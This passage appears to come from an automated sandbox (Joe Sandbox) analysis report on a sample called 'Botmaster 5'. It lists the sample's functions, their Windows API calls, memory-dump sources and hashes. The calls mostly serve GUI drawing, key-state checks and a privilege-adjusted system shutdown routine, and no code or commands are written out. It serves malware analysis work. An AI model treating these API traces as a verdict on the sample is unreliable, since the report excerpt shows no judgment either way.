                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2803490479-0
                                                                                                                                                                                                                  • Opcode ID: 4dede192f28fc955a0fd90a7b8e248aabbd5e486a4965c51e0ede6b6b0c13204
                                                                                                                                                                                                                  • Instruction ID: 95c32b0095bc2cda5f02e30766055fda6a1b49e4c83ff0515c45b5e548b35247
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4dede192f28fc955a0fd90a7b8e248aabbd5e486a4965c51e0ede6b6b0c13204
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4A012F490010057D6004B54E848406365C7A40200B800424F00581120D174D418C60B
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00416A20 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                  • Opcode ID: 37b4b23e18f207398b683a564d4fa16604f4091107e7e95cef210f44c94f2603
                                                                                                                                                                                                                  • Instruction ID: 238c979fcf42fb4a564b3973675ba70b792d3fc4a67049feef77c60bfbf389af
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37b4b23e18f207398b683a564d4fa16604f4091107e7e95cef210f44c94f2603
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DA022B200020022C808A2A0C00080A33A8CA88300F20080EB20282020CB38C0808200
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                  Function 00425769 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 105keyboardwindowthreadCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetFocus.USER32 ref: 0042576F
                                                                                                                                                                                                                  • GetKeyState.USER32(00000009), ref: 00425785
                                                                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 0042578D
                                                                                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 00425795
                                                                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 0042579D
                                                                                                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000005), ref: 004257AB
                                                                                                                                                                                                                  • wcsncmp.MSVCRT(?,Rich,00000004,?,?,0042493E,00000000,?,?,?,?,00000001), ref: 004257BD
                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000044E,00000000,00000000), ref: 004257D1
                                                                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 004257EF
                                                                                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 004257F7
                                                                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 004257FF
                                                                                                                                                                                                                  • GetPropW.USER32(00000000,PB_Hotkey), ref: 0042581D
                                                                                                                                                                                                                  • GetPropW.USER32(?,PB_WindowID), ref: 00425829
                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00425837
                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,0042493E,00000000,?,?,?,?,00000001), ref: 00425841
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: State$ProcessProp$ClassCurrentFocusMessageNameSendThreadWindowwcsncmp
                                                                                                                                                                                                                  • String ID: PB_Hotkey$PB_WindowID$Rich
                                                                                                                                                                                                                  • API String ID: 2516134572-1791564756
                                                                                                                                                                                                                  • Opcode ID: ad05d3291f8dd81fee3723423d571689c8b43c9a993ca25d9d0c79eb9fd2a352
                                                                                                                                                                                                                  • Instruction ID: fc801aef71440d75f190371d2809264cc6c02f579559d4f12008e5f023c8bd4f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad05d3291f8dd81fee3723423d571689c8b43c9a993ca25d9d0c79eb9fd2a352
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE218131B81729AAE7106B617D41FA76B9CAF54B80F880437FD0097281EAF99C1585BA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00404CE9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37shutdownCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00404D07
                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00404D0D
                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,0045DF2A), ref: 00404D23
                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000028,?), ref: 00404D53
                                                                                                                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00404D61
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                  • API String ID: 1314775590-3733053543
                                                                                                                                                                                                                  • Opcode ID: 1abc2f97a771349498a039efdc85877f5b8eff41b5a651995ed11faf8455be99
                                                                                                                                                                                                                  • Instruction ID: 387daa6a6a64cb6114735704e33f4ce4375a767862b2e758f598635f977d413d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1abc2f97a771349498a039efdc85877f5b8eff41b5a651995ed11faf8455be99
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0F030B11883087AE710AB61CD07F5B779CFF48708F50942ABA44991C1D7FDA9149B2A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042516E Relevance: 46.8, APIs: 31, Instructions: 333windowkeyboardCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 004251BF
                                                                                                                                                                                                                  • GetWindowRect.USER32(?,00000010), ref: 004251E7
                                                                                                                                                                                                                  • GetWindowRect.USER32(?,00000020), ref: 004251F0
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000003D), ref: 00425200
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000003E), ref: 00425207
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00425211
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000005), ref: 00425220
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0042522B
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000002D), ref: 00425239
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000002E), ref: 00425240
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000022), ref: 0042524F
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000023), ref: 00425256
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000003B), ref: 0042525D
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000003C), ref: 00425264
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000024,00000000,00000034), ref: 00425279
                                                                                                                                                                                                                  • GetKeyState.USER32(00000001), ref: 0042527D
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000201,00000001,00000000), ref: 00425293
                                                                                                                                                                                                                  • SetCapture.USER32(?), ref: 00425298
                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000231,00000000,00000000), ref: 004252A8
                                                                                                                                                                                                                  • GetCursorPos.USER32(-00000008), ref: 004252BE
                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,00007F86,00000002,00000000,00000000,00008040), ref: 004252D3
                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004252DA
                                                                                                                                                                                                                  • MapWindowPoints.USER32(?,00000000,?,00000001), ref: 00425316
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000214,?,00000010), ref: 00425339
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: System$Metrics$Window$Message$Send$CursorLongRect$CaptureImageInfoLoadParametersPointsPostState
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 985555588-0
                                                                                                                                                                                                                  • Opcode ID: f2e08a7cd1acdfc1ae548c32eee5e7cf75d9f5ed9e271dc8d4dd4ab9224f2e0f
                                                                                                                                                                                                                  • Instruction ID: 2e1f0fdec62ea51655281f1fe69951804a6055633f59756abcabc59ffd12caa0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2e08a7cd1acdfc1ae548c32eee5e7cf75d9f5ed9e271dc8d4dd4ab9224f2e0f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4C18471B00A26FFDB149F64EC48A7EBB79FB04340F904127F50596690D7B8ACA1CB95
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00423DD9 Relevance: 43.9, APIs: 21, Strings: 4, Instructions: 199libraryloaderwindowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(745C0000,OpenThemeData), ref: 00423E08
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CloseThemeData), ref: 00423E1A
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(DrawThemeBackground), ref: 00423E2C
                                                                                                                                                                                                                  • ImageList_GetIconSize.COMCTL32(?,00000000,00000000,00000000,00000000), ref: 00423E48
                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00423E57
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00423E70
                                                                                                                                                                                                                  • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00423EAD
                                                                                                                                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 00423EC1
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00423ED3
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00423F10
                                                                                                                                                                                                                  • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00423F51
                                                                                                                                                                                                                    • Part of subcall function 00424033: LoadLibraryA.KERNEL32(COMCTL32.DLL,00000000,00000000,?,?,?,?,00423DF3,00000000,00000000), ref: 00424053
                                                                                                                                                                                                                    • Part of subcall function 00424033: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00424068
                                                                                                                                                                                                                    • Part of subcall function 00424033: memset.MSVCRT ref: 00424079
                                                                                                                                                                                                                    • Part of subcall function 00424033: FreeLibrary.KERNEL32(00000000,?,?,?,?,00423DF3,00000000,00000000), ref: 004240B4
                                                                                                                                                                                                                    • Part of subcall function 00424033: LoadLibraryA.KERNEL32(uxtheme.dll,?,?,?,?,00423DF3,00000000,00000000), ref: 004240BF
                                                                                                                                                                                                                    • Part of subcall function 00424033: GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 004240D0
                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00423F67
                                                                                                                                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 00423F9B
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00423FB2
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00423FE2
                                                                                                                                                                                                                  • DrawFrameControl.USER32(?,?,00000004,00004408), ref: 00423FF8
                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00424004
                                                                                                                                                                                                                  • ImageList_Add.COMCTL32(?,00000000,004233F9,?,?,?,?,?,?,?,?,?,?,?,75C05540), ref: 0042400D
                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00424014
                                                                                                                                                                                                                  • DeleteObject.GDI32(004233F9), ref: 0042401D
                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00424026
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Objectmemset$AddressProc$CreateDeleteLibrary$ImageList_LoadSectionSelect$CompatibleControlDrawFrameFreeIconSize
                                                                                                                                                                                                                  • String ID: Button$CloseThemeData$DrawThemeBackground$OpenThemeData
                                                                                                                                                                                                                  • API String ID: 4127028306-2102849890
                                                                                                                                                                                                                  • Opcode ID: 078b2df20f936f9f7c49c55cc0d7c946a2d9018982575fc6ae9f7f9a369111a6
                                                                                                                                                                                                                  • Instruction ID: e891d2085421ae3e01e5ac2106ceda9a5576e1f0297b567496e20762531a9306
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 078b2df20f936f9f7c49c55cc0d7c946a2d9018982575fc6ae9f7f9a369111a6
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C711671D00218EBDF10DFA4ED459EEBBB9EF48701F104026F505EA260E7B98A90DB99
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00423779 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 106memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000014,75C05540,?,?,00000000,?,00420471,00000000), ref: 0042378F
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,000000C8,?,00000000,?,00420471,00000000), ref: 004237A9
                                                                                                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004237C4
                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 004237D5
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000032), ref: 004237E3
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000031), ref: 004237E8
                                                                                                                                                                                                                    • Part of subcall function 0042372B: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00423737
                                                                                                                                                                                                                    • Part of subcall function 0042372B: SelectObject.GDI32(00000000,00000000), ref: 00423758
                                                                                                                                                                                                                    • Part of subcall function 0042372B: GetStockObject.GDI32(00000004), ref: 00423760
                                                                                                                                                                                                                    • Part of subcall function 0042372B: FillRect.USER32(00000000,?,00000000), ref: 0042376E
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 004237FD
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 00423802
                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00423819
                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00423823
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000032), ref: 00423833
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000031), ref: 00423838
                                                                                                                                                                                                                  • ImageList_Create.COMCTL32(00000000,?,00000000,?,00420471,00000000), ref: 00423841
                                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,?,00000000,?,00420471,00000000), ref: 00423853
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 00423864
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 00423869
                                                                                                                                                                                                                  • ImageList_Create.COMCTL32(00000000,?,00000000), ref: 0042386C
                                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,?,00000000), ref: 0042387A
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MetricsSystem$Create$ImageList_$AllocCompatibleDeleteHeapMaskedObject$BitmapFillRectSelectStock
                                                                                                                                                                                                                  • String ID: DISPLAY
                                                                                                                                                                                                                  • API String ID: 189176691-865373369
                                                                                                                                                                                                                  • Opcode ID: dec99d51729fcd2752790843694ce9ab94537f0d477ff34ccdbc251af745bc53
                                                                                                                                                                                                                  • Instruction ID: 32afdf41e6380f8da2862bcae7b7c23eb1ba618ab2b5b33e98a2f4ffe6f1a122
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dec99d51729fcd2752790843694ce9ab94537f0d477ff34ccdbc251af745bc53
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8631527164035CBBEB107FB2AC49F5B7FACEB44795F010425FA009B191EBF55940CAAA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041D978 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 216COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetSysColor.USER32(00000008), ref: 0041DA4A
                                                                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 0041DA5A
                                                                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 0041DB1D
                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0041DB2D
                                                                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 0041DBF0
                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 0041DBF6
                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0041DC06
                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 0041DC0C
                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 0041DC24
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Color$BrushCreateSolid
                                                                                                                                                                                                                  • String ID: ComboBox$Edit$ListBox$RichEdit$RichEdit20A$RichEdit50W$SysListView32$SysTreeView32
                                                                                                                                                                                                                  • API String ID: 635153755-2512313857
                                                                                                                                                                                                                  • Opcode ID: 15fba703825619aa8d848eceff904255eb2b4fc039f839c07ea8efb643299119
                                                                                                                                                                                                                  • Instruction ID: 19150b3dcca0995d681f913c77baf223a2a70891355af2947d5c2c07b2f73a60
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15fba703825619aa8d848eceff904255eb2b4fc039f839c07ea8efb643299119
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 276192B1E1C314ABCB21BA35654289BB3969F64324F608C5FF18306391EA7EDC91D60F
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042560F Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 102windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 00425618
                                                                                                                                                                                                                  • GetFocus.USER32 ref: 00425621
                                                                                                                                                                                                                  • IsChild.USER32(00000001,00000000), ref: 00425638
                                                                                                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000032), ref: 00425652
                                                                                                                                                                                                                  • wcscmp.MSVCRT ref: 00425661
                                                                                                                                                                                                                  • wcscmp.MSVCRT ref: 00425681
                                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0042568F
                                                                                                                                                                                                                  • GetParent.USER32(00000000), ref: 004256B3
                                                                                                                                                                                                                  • EnumChildWindows.USER32(00000001,004255B9,?), ref: 004256D5
                                                                                                                                                                                                                  • SetFocus.USER32(?), ref: 004256E8
                                                                                                                                                                                                                  • EnumChildWindows.USER32(00000001,00425554,?), ref: 004256FF
